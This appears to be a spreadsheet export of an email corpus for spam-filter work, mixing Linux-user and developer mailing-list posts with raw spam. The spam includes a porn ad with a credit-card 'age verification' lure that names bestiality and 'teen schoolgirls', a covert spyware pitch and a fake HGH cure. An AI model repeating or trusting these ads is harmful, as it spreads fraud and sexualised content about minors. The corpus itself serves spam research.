 Q. Do I have to sign up for all 5 FREE membership sites?
 A. No, just one to get access to all of them.
 Q. Why do I have to give my Credit Card Information?
 A. It's for age verification purposes only and you will not be charged.
    If you don't believe us, just read their terms and conditions.
 Q. How do I get started?
 A. Click on one of the links below to become a Free member.
 ---------------------------
 # 5. &gt; Adults Farm
 http://80.71.66.8/farm/?aid=993751
 Girls and Animals Getting Freaky....FREE Lifetime Membership!!
 # 4. &gt; Sexy Celebes
 http://80.71.66.8/celebst/?aid=993751
 Thousands Of XXX Celebes doing it...FREE Lifetime Membership!!
 # 3. &gt; Play House Porn
 http://80.71.66.8/play/?aid=993751
 Live Feeds From 60 Sites And Web Cams...FREE Lifetime Membership!!
 # 2. &gt; Lesbian Lace
 http://80.71.66.8/lesbian/?aid=993751
 Girls and Girls Getting Freaky! ...FREE Lifetime Membership!!
 # 1. &gt; Teen Sex Fantasies
 http://80.71.66.8/teen/?aid=993751
 Teen Schoolgirls, Live Sex Shows ...FREE Lifetime Membership!!
 --------------------------
 Jennifer Simpson, Miami, FL
 Your FREE lifetime membership has entertained my boyfriend and I for
 the last two years!  Your Adult Sites are the best on the net!
 Joe Morgan Manhattan, NY
 Your live sex shows and live sex cams are unbelievable. The best part
 about your porn sites, is that they're absolutely FREE!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http://80.71.66.8/optout/index.html Please allow 24 hours for removal.
 This e-mail is sent in compliance with the Information Exchange
 Promotion and Privacy Protection Act. section 50 marked as
 'Advertisement' with valid 'removal' instruction.
 bdyjkpbwheotewwcloiveajvkidto
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG-Social] spam...
</t>
  </si>
  <si>
    <t xml:space="preserve">ok, if an email address is not in my whitelist, they are asked to confirm.
 in that message there is the following text:
     If your message was an unsolicited message attempting to sell
     Kevin some product or advertise one scam or another, then DO NOT
     reply to this message.  If you do reply and he has some free time
     on his hands, He'll find out who and where you are and send you his
     review of your email and an invoice for EUR 1,000 for his services.
     Plus he'll probably try to patch me in some unpleasant way so *please*
     don't reply if you're one of those people.
 in addition, all of this information is logged.  in the past two to three
 months, two spammers have replied.  i think that this is a valid notice.
 what i'm wondering is the following:
     a)  are there debt collection agencies you can hire to get such debts?
     b)  if i can't get money from them, can i declare them on my taxes
 	here as a bad debt and get tax relief?
 one way to get the gov't to notice spam...
 kevin
 -- 
 kevin@ie.suberic.net          dante hicks: but you hate people.
 fork()'ed on 37058400         randal graves: yes, but i love gatherings.
 meatspace place: home                        isn't it ironic?
 http://ie.suberic.net/~kevin       --clerks
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: MILFs that like to F-CK!!!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 How is this any different from attaching an Infobot or A.L.I.C.E
 through licq's console-hook?  People have been doing that for years,
 and for over a decade in IRC and the MUDs.
 ... and the one thing I think we've learned in all that time is that,
 as a help-desk, it doesn't work.  People just don't like talking to
 robots, especially when the robots, once confused, become imbeciles.
 I think the humans may feel cheated, deceived and tricked when they
 discover, as with the Seattle answer, that they are talking to a
 machine; there's no real intelligence behind that simulated-friendly
 and therefore empty 'thx'.
 AIML is clever and cute, but for /practical/ applications as a first
 line of technical support?  It's been tried over and over, and while I
 /also/ think that it /should/ work, for the most part, people won't
 use it.  What's worse, as we make the NL processing more and more
 clever, it only means it fails more dramatically; ALICE doesn't just
 stumble a bit, it starts to drool.  And ALICE is the best we have.
 Like a Dalek: All very impressive when things are going well, but all
 it takes to betray the chicken-brain inside is a towel over it's
 ill-placed eye, or a spin off the metal surface ;)
 In all the prolog-based NL database query systems of the 1980's and
 other later chatterbot helpdesk projects like Shallow Red, even
 simpler tries like Ask Jeeves, people very quickly know they're
 talking to a robot, and the queries anneal to short, truncated and
 terse database-like verb-noun or just noun-keyword requests.  
 People are just too quick to adapt, and too impatient to forgive a
 clunky interface, and for now, especially when the /average/ computer
 user still can't type more than maybe 5-10wpm, NL is a painfully slow
 clunky interface.
 Put it this way: Would you login, wake the bot and ask for the Seattle
 weather, or would you do as we /all/ do and just click the weather
 icon sitting there on your desktop?
 Just for fun, here's an interesting conversation between Shallow Red,
 ALICE and Eliza as they decide to play the Turing Game:
 http://www.botspot.com/best/12-09-97.htm
 -- 
 Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
  - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
   "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Sam Ruby: "Yup, I'm a sick puppy." _Me too!_
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:8:07:06PM
 Date: Wed, 25 Sep 2002 03:07:06 GMT
 Sam Ruby[1]: "Yup, I'm a sick puppy." _Me too!_
 [1] http://www.intertwingly.net/blog/844.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Brand Name Product Business
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,
 BRAND NAME PRODUCTS
 Any brand name products you would like to buy or sell in volume? Please try us!!!
 Union (since 1989) specialized in trading brand name products. We have very strong connection with every corner in worldwide and always can do something what others are not able to do specially in China market. 
 We sell USD 10 million value products monthly and stock level is USD 3 million.
 Product Range 
 1) Computer/Office equipment Supplies
 2) Computer Hardware
 3) Copier/Fax/Printer
 4) Stationery
 5) Camera/Film/Battery/Photo Paper
 6) Digital Video/Still Camera
 7) Consumer Electronic Products
 8) Video Games
 9) Car Audio
 10) Mobile Phone
 For more details, please visit our visit website: http://www.unioncameraltd.com
 Please also come back to us about your interests and let us know more about your current business.
 Awaiting for your reply.
 Best regards,
 William Chao
 Owner
 We are pleased to invite you to visit our booth  
 CEBIT 2002 HANNOVER
 (Hall 25) Stand A64
 March 13-20, 2002               
 Union Camera Limited
 http://www.unioncameraltd.com/
 e-mail: unionc@unioncameraltd.com
 address: 1812 Wu Sang House, 655 Nathan Rd.,Kln.,Hong Kong.
 Tel: 852 23079338         Fax: 852 23873058
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Secretly Record all internet activity on any computer... BV
</t>
  </si>
  <si>
    <t xml:space="preserve">FIND OUT WHO THEY ARE CHATTING/E-MAILING WITH ALL THOSE HOURS!
 Is your spouse cheating online? 
 Are your kids talking to dangerous people on instant messenger?
 Find out NOW! - with Big Brother instant software download.
 Click on this link NOW to see actual screenshots and to order!
 http://213.139.76.69/ec/bigbro/M30/index.htm
 To be excluded from future contacts please visit:
 http://213.139.76.69/PHP/remove.php
 danie
</t>
  </si>
  <si>
    <t xml:space="preserve">[Skip]
 &gt; Hmmm.   How about you create empty Data/Ham/Set[12345], stuff all your
 &gt; files into a Data/Ham/reservoir folder, then run the rebal.py script to
 &gt; randomly parcel messages out to the various real directories?
 I'm afraid rebal is quadratic-time in the # of msgs it shuffles around --
 since it was only intended to move a few files around, it's dead simple.
 An easy thing is to start the same way:  move all the files into a single
 directory.  Then do random.shuffle() on an os.listdir() of that directory.
 Then it's trivial to split the result into N slices, and move the files into
 N other directories accordingly.
 &gt; I suspect you can pull the same stunt for your Data/Spam stuff.
 Yup!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 "Craig R.Hughes" said:
 &gt; Are you filtering the nonspamtrap for spam when those 
 &gt; newsletters sold your address to someone you didn't sign up 
 &gt; with?  You should probably manually verify that all the mail in 
 &gt; the trap is in fact nonspam!
 Yep.  so far it's all opt-in stuff, no "affiliate deals" etc.
 --j.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</si>
  <si>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
 As far as I know, there are ide add-in cards that support hot-plugging of
 drives, not too sure if this feature is availabe on the cheaper
 promise/highpoint controllers, but it is definitely available on the
 higher-end (true ide-raid) cards.
 Cathal.
 On Fri, 16 Aug 2002, Ciaran Johnston wrote:
 &gt; Vincent Cunniffe said:
 &gt; &gt; I run several co-located servers, and the solution I have adopted is
 &gt; &gt; IDE drives. They're cheap, fast, and you don't have to keep buying
 &gt; &gt; media for them. Combine it with a removable HD caddy from Peats or
 &gt; &gt; Maplins, and you have a complete onsite/offsite backup solution with 4
 &gt; &gt; entire generations of data for about 250 (2 * 80GB/5400 drives and a
 &gt; &gt; caddy for the server).
 &gt; &gt;
 &gt; &gt; You do need 60 seconds of downtime to replace the drive, but that's
 &gt; &gt; pretty trivial if done once per month.
 &gt;
 &gt; Hmmm... this does sound interesting. I think it may be the way to go... I'd
 &gt; still be interested in hearing people's opinions on the tape drives I
 &gt; mentioned, though, esp. wrt. this solution. I know knocking a drive around
 &gt; doesn't do it any good.
 &gt;
 &gt; /Ciaran.
 &gt;
 &gt;
 &gt;
 &gt;
 &gt;
 &gt;
 -- 
 Cathal Ferris.			pio@skynet.ie
 +353 87 9852077			www.csn.ul.ie/~pio
 ---
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Bad Credit Breakthrough!!!               25735
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: 2002.06.00.00
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 24 Sep 2002 ThosStew@aol.com wrote:
 --]Klez, most likely. It'll pick up your address and send mail to all your
 --]friends, and your strangers, as if coming from you. Nice way to lose friends
 --]and meet strangers. Better than typing gibberish (or Hemingway, but I repeat
 --]myself) in a bar with a double of scotch.
 Friends dont let friends use Outlook....even after a douly shot of the
 scotch with a chaser.
 All hands on the stinky one.
 -tom(the other tommeat)
</t>
  </si>
  <si>
    <t xml:space="preserve">On 26 Aug 2002, RossO wrote:
 --]Does anyone here know if the Computational Recreations columns from
 --]Scientific American in the 70's/80's were compiled into a book or two? I
 --]think I remember Martin Gardner publishing the earlier Mathematical
 --]Recreations in a couple of hard covers, but I'm unsure about the later
 --]column. Help?
 --]
 Not sure about MG, though I know pretty much everything he penned got into
 print at one time or another.  SA needs to do what National Geo did and
 put out thier back issues on CD.
 Post MG in the 80's there were the colums by A K Dewdney that I dug a
 bunch put into a book  called Turing Omnibus and then there is , of
 course, all the goodens put out by Dougy Hoffstadler.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">	
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Justin
 &gt; Mason
 &gt; 
 &gt; So IMO it's the corruption that's the problem; and corruption !=
 &gt; regulation, and corruption != socialism.   Also, over-population is
 really
 &gt; a symptom of that.
 Socialism increases regulation which increases corruption.  But that
 doesn't matter as much as if the official law does not conform to the
 facts on the ground.
 If you don't match the law to the facts on the ground, you wind up with
 a two-tier society (De Soto's Bell Jar).  Worse, the massive evasion of
 the official law encourages the corruption you speak of.
 In some countries, the agencies in charge of registering property also
 arrange for illegal living arrangements for their employees.  They do
 this because even the people who run the system can't make it work for
 people they care about.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Forged documents, public drinking, massive fistfights... Who knew
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8410272,1717/
 Date: 2002-09-30T22:21:09+01:00
 (Philly.com)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: GA Development (was Re: [SAdev] [Bug 1030] NO_INVENTORY
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sep 25,  7:35pm, Daniel Quinlan wrote:
 &gt; Allen Smith &lt;easmith@beatrice.rutgers.edu&gt; writes:
 &gt; 
 &gt; &gt; Well, I have been doing a bit of fiddling with the GA. I don't have
 &gt; &gt; a _large_ corpus practically available to me (or processable within
 &gt; &gt; reasonable processor time - I can justify the GA fiddling part as
 &gt; &gt; being part of my research, but not the mail processing...), so in
 &gt; &gt; order to test out my changes someone needs to send me a copy of the
 &gt; &gt; "tmp/scores.h" and "tmp/tests.h" that get generated prior to the GA
 &gt; &gt; going into action.
 &gt; 
 &gt; Why not start with mass-check corpus results? It's much easier to get
 &gt; those
 Ah. As in getting a directory listing of the corpus server and doing some
 downloads? OK, done.
 &gt; and you can create your own tmp/scores.h and tmp/tests.h.
 Good point. Will report back on my results.
 	-Allen
 -- 
 Allen Smith			http://cesario.rutgers.edu/easmith/
 September 11, 2001		A Day That Shall Live In Infamy II
 "They that can give up essential liberty to obtain a little temporary
 safety deserve neither liberty nor safety." - Benjamin Franklin
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 1 Oct 2002, Angles Puglisi wrote:
 &gt; Is it possible to use new apt to do (null) to RH8 upgrade?
 Possible - should be, it was possible to update to (null) from RH7.3 with 
 apt. Did that on my laptop and well.. it was painfull to say the least 
 (including a ecovery from totally corrupted rpmdb) Don't expect it to be 
 an easy 'dist-upgrade' at any rate, so much stuff has changed and apt 
 doesn't always handle all that well the way dependencies are set in 
 RHL.
 &gt; 
 &gt; Even if it's possible, are there good reasons why maybe I should not do
 &gt; it and just use the RH iso's (I don't think RH8 will upgrade from
 &gt; (null), maybe up2date will)?
 It's possible but not supported by RH. I've upgraded both my laptop and my 
 home box from (null) to RH8.0 and didn't encounter any issues though.
 -- 
 	- Panu -
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] 3c509 &amp; 2.4.19 problems
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi folks,
 I decided to upgrade the kernel on a machine at home from 2.2.18pre21 to the latest from kernel.org which is 2.4.19.
 However I have encountered one problem, my network card now dosent work, well kind of dosent work...
 Instead of one eth0 on IRQ 10 I now get:
 Aug  4 11:31:51 mira kernel: eth0: 3c5x9 at 0x220, 10baseT port, address  00 10 5a 3e 0e 48, IRQ 5.
 Aug  4 11:31:51 mira kernel: 3c509.c:1.18 12Mar2001 becker@scyld.com
 Aug  4 11:31:51 mira kernel: http://www.scyld.com/network/3c509.html
 Aug  4 11:31:51 mira kernel: eth1: 3c5x9 at 0x300, 10baseT port, address  00 10 5a be 0e 48, IRQ 10.
 Aug  4 11:31:51 mira kernel: 3c509.c:1.18 12Mar2001 becker@scyld.com
 Aug  4 11:31:51 mira kernel: http://www.scyld.com/network/3c509.html
 This results in the interface(s) coming up but while packets can go out they can not come in.
 I've tried not loading the 3c509 mdule on bootup and then `modload 3c509 IRQ=10` bit it still gets loaded as above, on IRQ 5 and 10. On 2.2 it loads to IRQ 10.
 Anyone got any suggestions on what to do here? Its a debian 3.0 distro. This works fine when booted to 2.2 so the hardware/BIOS etc seem ok, so it seems to be 2.4 spacific. Have I missed some kernel setting?
 Cheers,
 ~Al
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Flying cars here, jetpacks next?
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85485805
 Date: Not supplied
 Moller, a public company in Davis, California, has developed a flying car.  
     [IMG: http://www.craphound.com/images/flyingcar.jpg] Moller International 
     has developed the first and only feasible, personally affordable, personal 
     vertical takeoff and landing (VTOL) vehicle the world has ever seen. 
     You've always known it was just a matter of time before the world demanded 
     some kind of flying machine which would replace the automobile. Of course, 
     this machine would have to be capable of VTOL, be easy to maintain, cost 
     effective and reliable. Well, we at Moller International believe we have 
     come up with the solution. That solution is the volantor named M400 Skycar. 
 Link[1] Discuss[2] (_Thanks, Mark!_)
 [1] http://www.moller.com/skycar/
 [2] http://www.quicktopic.com/boing/H/kpP4y4RMJ63SA
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Gracie Allen: "Never put a period where God has placed a comma."
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:3:23:55PM
 Date: Wed, 25 Sep 2002 22:23:55 GMT
 Gracie Allen[1]: "Never put a period where God has placed a comma."
 [1] http://www.inspirationpeak.com/archives/2001/012301.html
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I've got a test set here that's the last 3 and a bit years email to
 info@ekit.com and info@ekno.com - it's a really ugly set of 20,000+
 messages, currently broken into 7,000 spam, 9,000 ham, 9,000 currently
 unclassified. These addresses are all over the 70-some different 
 ekit/ekno/ISIConnect websites, so they get a LOT of spam.
 As well as the usual spam, it also has customers complaining about 
 credit card charges, it has people interested in the service and 
 asking questions about long distance rates, &amp;c &amp;c &amp;c. Lots and lots 
 of "commercial" speech, in other words. Stuff that SA gets pretty 
 badly wrong.
 I'm currently mangling it by feeding all parts (text, html, whatever 
 else :) into the filters, as well as both a selected number of headers 
 (to, from, content-type, x-mailer), and also a list of 
 (header,count_of_header). This is showing up some nice stuff - e.g. the 
 X-uidl that stoopid spammers blindly copy into their messages.
 I did have Received in there, but it's out for the moment, as it causes
 rates to drop.
 I'm also stripping out HTML tags, except for href="" and src="" - there's
 so so much goodness in them (note that I'm only keeping the contents of
 the attributes). 
 --
 Anthony Baxter     &lt;anthony@interlink.com.au&gt;
 It's never too late to have a happy childhood.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Oh my...
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello fork,
   So they have Aaron Schwartz on NPR's Weekend Edition talking
   about Warchalking.   I'll agree, its funny, his voice is squeaky and
   I'm jealous that he got on radio and I didn't...
   But really, WTF is the big deal about warchalking?  I have yet to
   see any of it, anywhere.
   LInk will probably pop up on www.npr.org later today.
 -- 
 Best regards,
  bitbitch                          mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Ouch.... hooooo....
 Cheers,
 RAH
 --- begin forwarded text
 Date: Thu,  5 Sep 2002 09:17:13 -0700
 From: Same Guy
 Subject: Re: Electric car an Edsel...
 To: "R. A. Hettinga"  &lt;rah@shipwright.com&gt;
 Bob,
 This guy's an idiot.
 I design loads for systems with the 50 kV capacitors.  One of those has 864
 of such capacitors and stores only 10 megajoules, which means 11 kilojoules
 each.  They weigh 125 kg.
 You need high energy per unit mass, and the capacitive system I picked
 maximizes that.
 It is precisely the system that Maxwell is touting for electrical braking
 and power augmentation for regenerative use in automobiles.  You also need
 voltage you can use in a DC motor, which is why though the actual
 capacitors in the system are charged to 2.5 volts, the system has them
 arranged in series to boost the voltage.
 Ignore him.  He's a waste of my time.
 &lt;Somebody's .sig&gt;
 ------------------------
   From: "R. A. Hettinga" &lt;rah@shipwright.com&gt;
   Subject: Re: Electric car an Edsel...
   Date: Wed, 4 Sep 2002 15:31:39 -0400
   To: Some people...
 --- begin forwarded text
 Date: Wed, 4 Sep 2002 07:59:10 -0700 (PDT)
 From: "Adam L. Beberg" &lt;beberg@mithral.com&gt;
 To: "R. A. Hettinga" &lt;rah@shipwright.com&gt;
 cc: &lt;fork@spamassassin.taint.org&gt;
 Subject: Re: Electric car an Edsel...
 On Wed, 4 Sep 2002, R. A. Hettinga wrote:
 &gt; Maxwell (www.maxwell.com) makes and sells high energy density capacitors,
 &gt; called ultracapacitors.  They deliver them in an air-cooled, voltage
 &gt; regulated module that will charge to 42 V and hold 128 kilojoules -- roughly
 &gt; the energy in 2 teaspoons of sugar or a bite of a donut -- and weighs 16
 &gt; kilograms.  If that electrical energy could all be converted to kinetic
 &gt; energy, there's enough to get the capacitor module up to about 200 mph -- in
 &gt; a vacuum.
 Since the energy you can pack into a capacitor is something like
 1/2*C*(V^2), you want to design your system with the lowest voltage possible
 to fully exploit that V^2 ;) So yea, a 42V system will only be useful for
 accelerating insects, not cars. That must be why 40kV is standard not 42.
 (the joke of putting 42 into goggle to find that model was not missed BTW)
 Most production systems use a mix of batteries and capacitors, as very few
 real world applications run for less then 10 seconds like the car we were
 talking about originally. Even 10 seconds is pushing the "capactior is the
 wrong choice" limits. Thats why the landspeed record model is a battery one,
 it's got to run for a much longer period of time and needs a steady
 discharge curve.
 But it should be safe to say that most people want the Indy 500 version, not
 the 1/4 mile sprint version when they are looking for a vehice :) For those
 you dont want a battery or a capacitor, you want to take advantage of whole
 atoms, not just electrons. Then you can suck off the electrons you need with
 a fuel cell. However, you will use both capacitors for the braking/accel,
 and batteries to not just dump excess energy in the design.
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com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---------------End of Original Message-----------------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</si>
  <si>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[SAdev] [Bug 1012] negate directive addition
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.hughes-family.org/bugzilla/show_bug.cgi?id=1012
 ------- Additional Comments From easmith@beatrice.rutgers.edu  2002-09-21 16:41 -------
 I like this idea, but from my reading - part of my dissertation research -
 on GAs (or, in this case, more precisely "Evolutionary Programming", since
 the parameters are non-binary and the major operator is mutation, not
 crossover), you do need to keep in mind that the more interactions there are
 between different variables, the better-tweaked the GA/EA will need to be,
 especially to avoid local optima (which may have been the problem with the
 suspiciously-high "anti-ratware" USER_AGENT scores). From past results,
 what's needed are one or more of the below:
         A. Determine mutational parameters by adapted-scores themselves,
            with variation on a per-original score basis; ideally, allow
            for having "correlated" mutations - in other words, have a
            mechanism in place for trying out changes to a bunch of scores at
            once, with them all moving about the same amount (albeit possibly
            in different directions) - one means to do this is found in the
            "Evolutionary Strategies" of Schwefel;
         B. Adapt the probability of a mutation taking place depending on how
            well previous mutation tries have done - if more than about a
            fifth of the new "individuals" are doing about as well as, or
            better than, the parental generation, then mutate more
            parameters; if less than a fifth of them are doing about as well
            as, or better than, the parental generation, then mutate less
            parameters.
         -Allen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</si>
  <si>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On Wed, Jul 31, 2002 at 11:28:05AM +0100, Satelle, StevenX mentioned:
 &gt; When I was in school they pushed Irish down my throat. I developed a hatred
 &gt; for Irish. I did French for 3 years and German for 6 months, I could
 &gt; (almost) hold a basic conversation. I am proud of the fact that I don't know
 &gt; one word of Irish. 
  Sad, that.
  I felt like that till recently, but now wish that it wasn't rammed down
 my throat like worming tablets. If they hadn't, it is very possible I'd be
 an Irish speaker.
 John
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Jobs, Jobs, Jobs: HEUTE, 03.07.02 ist virtueller Messetag der jobfair24!!!
</t>
  </si>
  <si>
    <t xml:space="preserve">Hallo Xxxxxxxxx Yyyyyyy,
 HEUTE, 03. Juli, ist monatlicher Messetag der virtuellen 3D-Job-Messe!!
 Ihre Chance, die Weichen fuer einen erfolgreichen Berufsein- und
 Karriereaufstieg zu stellen.
 Zwischen 13 und 18 Uhr erwarten Sie HEUTE die Personalmanager zahlreicher
 Unternehmen, die Stellen fuer engagierte neue Mitarbeitern anbieten.
 Dieser Link fuehrt Sie direkt in die 3D-Messehalle! (Falls Sie noch keine
 3D-Software haben, koennen Sie sie hier mit einem Klick installieren):
 http://www.jobfair24.de/forwarding/messe/mmbrfs.html
 Dieser Link fuehrt in die 2D-Ansicht der jobfair24 (keine 3D-Software
 noetig):
 http://www.jobfair24.de/forwarding/messe/mmbrfs2d.html
 Viel Spass und Erfolg auf der jobfair24!
 Also kommen Sie vorbei, wir freun uns!
 Ihr jobfair24-Team
 --------------
 Infos zum Newsletter: 
 -------
 Dieser Newsletter wurde versendet an: Xxxxxxxxx.Yyyyyyy@web.de 
 Falls Sie Fragen haben, Hilfe benoetigen bzw. Anregungen oder Kritik
 aeussern wollen (oder vielleicht ein kleines Lob :-)), wenden Sie sich
 bitte an: newsletter@jobfair24.de Wenn Sie den Newsletter wieder
 abbestellen wollen, klicken Sie hier:
 http://www.jobfair24.de/cgi-bin/newsletter/unsubscribe.cgi
 Falls Sie diesen Newsletter durch einen Freund erhalten haben und ihn gerne
 abonnieren wuerden:
 http://www.jobfair24.de/cgi-bin/newsletter/newsletter.cgi 
 Es kann leider hin und wieder passieren, dass durch fehlerhafte
 Eintragungen von E-Mail Adressen Mails falsch zugestellt werden. Dies ist
 natuerlich unbeabsichtigt... Um sich aus der Liste zu loeschen einfach hier
 klicken: http://www.jobfair24.de/cgi-bin/newsletter/unsubscribe.cgi oder
 besuchen Sie uns doch einmal auf unserer Homepage
 http://www.jobfair24.de/start.html und lassen Sie sich vom Flair der
 weltweit ersten virtuellen 3D-Job-Messe begeistern!
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hgh: safe and effective release of your own growth hormone!27103
</t>
  </si>
  <si>
    <t xml:space="preserve">As seen on NBC, CBS, CNN, and even Oprah! The health discovery that actuallyreverses aging 
 while burning fat, without dieting or exercise! This provendiscovery has even been reported 
 on by the New England Journal of Medicine.Forget aging and dieting forever! And it's 
 Guaranteed! 
 Click below to enter our web site:
 http://www205.wiildaccess.com/hgh/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Click below to enter our web site:
 http://www205.wiildaccess.com/hgh/
 **************************************************
 If you want to get removed
 from our list please email at- affiliateoptout@btamail.net.cn
 (subject=remove "your email")
 **************************************************
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: customising FTOC display for specific folders...
</t>
  </si>
  <si>
    <t xml:space="preserve">Is there any way to customise the folder table of contents for
 specific folders?
 I know it is possible to do per-folder customisation with components
 and replcomps for message templates, but what about -form format
 files for scan?
 Cheers
 Tony
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">[Barry]
 &gt; Here's an interesting thing to test: discriminate words differently if
 &gt; they are on a line that starts with `&gt;' or, to catch styles like
 &gt; above, that the first occurance on a line of &lt; or &gt; is &gt; (to eliminate
 &gt; html).
 Give me a mod to timtoken.py that does this, and I'll be happy to test it.
 &gt; Then again, it may not be worth trying to un-false-positive that
 &gt; Nigerian scam quote.
 If there's any sanity in the world, even the original poster would be glad
 to have his kneejerk response blocked &lt;wink&gt;.  OTOH, you know there are a
 great many msgs on c.l.py (all over Usenet) that do nothing except quote a
 previous post and add a one-line comment.  Remove the quoted sections from
 those, and there may be no content left to judge except for the headers.  So
 I can see this nudging the stats in either direction.  The only way to find
 out for sure is for you to write some code &lt;wink&gt;.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NEWS.COM INVESTOR: Techs fall with consumer sentiment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</si>
  <si>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href="http://clickthru.online.com/Click?q=b8-smr2QQUw-VgTuqBlq9S_p8qkEi9R"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href="http://clickthru.online.com/Click?q=cd-VHhSQzsK3TBlvnHFjAi_TOlRfXuR" &gt;My Portfolio&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=e2-J1OpQhyzY9JYnGIENBEZdihv9KsR" &gt;Broker Reports&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=f7-N0QnQLgzfYflr_IlrZIGiR6ImOZR" &gt;IPOs&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=0d-3aGuIbr2qbA1qjaNv0T0QkY6b7uR" &gt;Splits&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=22-xNrrIrdA8Q4bkTauo4I9yc99NcsR" &gt;Messages&lt;/a&gt;&lt;/b&gt;
 &lt;/font&gt;
 &lt;!-- /nav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href="http://clickthru.online.com/Click?q=37-EMLQIqzF4Pj1EstQ93KjZ6eJcnZR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=4c-jxi2IZpIbJaBkReAu7hgvo2AKenR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=61-x9oAIoLjvQW4buG4JYndFK-AWlrR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=76-vJf7InBPTWF07h41okYP2r70U6iR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=37-EMLQIqzF4PjlPdUQ93KjZ6eJcnZR"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12,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href="http://clickthru.online.com/Click?q=4c-jxi2IZpIbJaBkRPAu7hgvo2AKenR" &gt;DJIA&lt;/a&gt;&lt;br&gt;8684.53 &amp;nbsp;&lt;font color=#cc0000&gt;-117.00&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=61-x9oAIoLjvQW4bub4JYndFK-AWlrR" &gt;NASDAQ&lt;/a&gt;&lt;br&gt;1373.49 &amp;nbsp;&lt;font color=#cc0000&gt;-0.94&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=76-vJf7InBPTWF07hi1okYP2r70U6iR" &gt;S&amp;P 500&lt;/a&gt;&lt;br&gt;921.39 &amp;nbsp;&lt;font color=#cc0000&gt;-5.98&lt;/font&gt;&lt;/td&gt;
